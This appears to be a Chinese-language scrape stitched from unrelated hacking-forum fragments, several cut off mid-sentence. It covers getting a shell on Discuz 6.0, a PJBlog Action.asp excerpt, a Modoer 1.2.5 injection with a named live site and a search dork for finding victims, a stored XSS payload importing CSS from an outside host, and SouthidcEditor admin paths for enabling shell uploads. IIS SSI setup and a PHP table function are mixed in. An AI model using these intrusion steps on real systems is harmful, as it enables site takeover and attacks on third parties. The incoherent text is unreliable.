看到一个讨论dz6.0拿shell的帖子，大意是碰到一个6.0的后台，利用7.0老君的拿shell的方法在自定义模板变量那里插shell，提示非法，于是不知接下来要怎么办搞到shell，然后在下面看到某位兄台的回复，给出了2种方法，LZ最后也解决了问题，所以在此记录一下，方便自己以后使用。

1:
http://127.0.0.1/admincp.php?action=runwizard&frames=

PJBlog一套开源免费的中文个人博客系统程序，采用asp+Access的技术，具有相当高的运作效能以及更新率，也支持目前Blog所使用的新技术

在文件Action.asp中：
ElseIf Request.QueryString("action") = "updatepassto" Then   //第307行
If ChkPost() Then
Dim e_Pass, e_RePass, e_ID, e_Rs, e_hash, d_pass
e_ID = CheckStr(UnEscape(Request.QueryString("id")))
e_Pass = CheckStr(UnEscape(Request.QueryString("pass")))
e_RePass = CheckStr(UnEscape(Request.QueryString("repass")))

这两天都很忙   无意来tools看了下 一个农村娃发布的Modoer 1.2.5 注入0day 也没介绍清楚 怎么利用 就研究了下 发布个简单的利用方法 共享下 至于拿shell 没怎么研究! 演示站点：http://www.ytdianping.com 关键字：intitle:Powered by Modoer intitle:游戏 可以根据需求自行拿站 测试漏洞: ajax.php

漏洞原因：由于编辑器过滤不严，将导致恶意脚本运行。可getshell

为什么说它是ODay呢，能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。

下面说说利用方法。
条件有2个：
1.开启注册
2.开启投稿

注册会员----发表文章

内容填写：
<style>@im\port'\http://xxx.com/xss.css';</style>

IIS里添加一个应用程序扩展名映射

　　可执行文件:C:\WINDOWS\system32\inetsrv\ssinc.dll

　　扩展名:shtml/shtm

　　windows 2003

　　2003默认已经支持SSI(shtml文件),

　　只需在IIS的"Web服务扩展"里设置"在服务器端的包含文件"为"允许" 即可

　　IIS6.0对于SSI进行了一些改进，以前IIS5.0的一些程序迁移过后可能无法运用。

　　一个经常的出现问题是出现如下错误：

　　"处理 SSI 文件时出错 － Error processing SSI file"

　　经过测试，以下做法会导

网上找到的所谓让firefox换行的方法，在我这里都失效了，可能因为我这里的表格不是固定宽度的原因吧。

用javascript换行整个表格的话，一是增加很多代码，二是我还没有研究过如果遍历表格。

故我的方法是，直接用php函数过滤后再直接输出，这样的话就可以适用于所有浏览器，不存在兼容问题了。

//表格单元格强制换行和固定宽度 $vtd 字符串 单元格文本,$t 表格的列数
function wrap($vtd,$t){
$slen=strlen($vtd);
if($slen<50){
   $wrap=$vtd;
}else{
   if($s

输入直接进入编辑器

/Southidceditor/admin_style.asp?action=copy&id=14

/SouthidcEditor/Admin_Style.asp?action=styleset&id=47

然后随便找遍文章设置上传文件后缀！

然后点刚设置后缀的那遍文章，预览随便上传个文件就行了！